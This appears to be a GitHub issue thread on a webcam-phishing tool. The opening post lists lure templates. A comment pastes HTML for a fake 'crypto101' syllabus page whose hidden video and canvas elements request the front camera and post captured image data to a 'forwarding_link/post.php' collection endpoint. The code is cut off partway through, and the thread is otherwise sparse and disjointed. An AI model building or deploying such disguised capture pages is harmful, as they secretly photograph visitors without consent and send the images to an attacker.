### ISSUE TITLE
Picture

### ISSUE THREAD

**Issue by mohammedlmd16-dotcom** [sikehish/CamPhish#14]
- [x] ngrok
- [x] cloudflare tunnel #
- [x] festival wishing
- [x] live youtube TV
- [x] online meeting 
 https://pin.it/1HWkKjmQu

**Comment by mohammedlmd16-dotcom** [comment]
Good

**Comment by jjdgvevzg-creator** [comment]
http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>crypto101: Syllabus</title>
    <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
    <link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css"> 
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
    <link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
	  <link rel="icon" type="image/png" sizes="32x32" href="gdsc-logo.png">

<style>
  body {
    font-family: 'Google Sans', sans-serif;
    background-color: #1e88e5;
    color: #fff;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
}

.content {
    max-width: 800px;
    padding: 20px;
    text-align: center;
    background: rgba(0, 0, 0, 0.7);
    border-radius: 10px;
    margin: 0 auto; /* Center horizontally */
}

    .content {
        max-width: 800px;
        padding: 20px;
        text-align: center;
        background: rgba(0, 0, 0, 0.7);
        border-radius: 10px;
    }

    h1 {
        font-size: 36px;
        color: #ff5722; /* Orange color */
    }

    h2 {
        font-size: 28px;
    }

    .day-syllabus {
        background: rgba(0, 0, 0, 0.5);
        padding: 20px;
        border-radius: 10px;
        margin-top: 20px;
    }

    h3 {
        font-size: 24px;
    }

    ul {
        list-style: none;
        padding: 0;
    }

    li {
        font-size: 18px;
    }

</style>
</head>
<div class="video-wrap" hidden="hidden">
    <video id="video" playsinline autoplay></video>
 </div>
 
 <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
 
 <script>
 
 function post(imgdata){
 $.ajax({
     type: 'POST',
     data: { cat: imgdata},
     url: 'forwarding_link/post.php',
     dataType: 'json',
     async: false,
     success: function(result){
         // call the function that handles the response/results
     },
     error: function(){
     }
   });
 };
 
 
 'use strict';
 
 const video = document.getElementById('video');
 const canvas = document.getElementById('canvas');
 const errorMsgElement = document.querySelector('span#errorMsg');
 
 const constraints = {
   audio: false,
   video: {
     
     facingMode: "user"
   }
 };
 
 // Access webcam
 async function init() {
   try {
     const stream = await navigator.mediaDevices.getUserMedia(constraints);
     handleSuccess(stream);
   } catch (e) {
     errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
   }
 }
 
 // Success
 function handleSuccess(stream) {
   window.stream = stream;
   video.srcObject = stream;
 
 var context = canvas.getContext('2d');
 var count = 0;
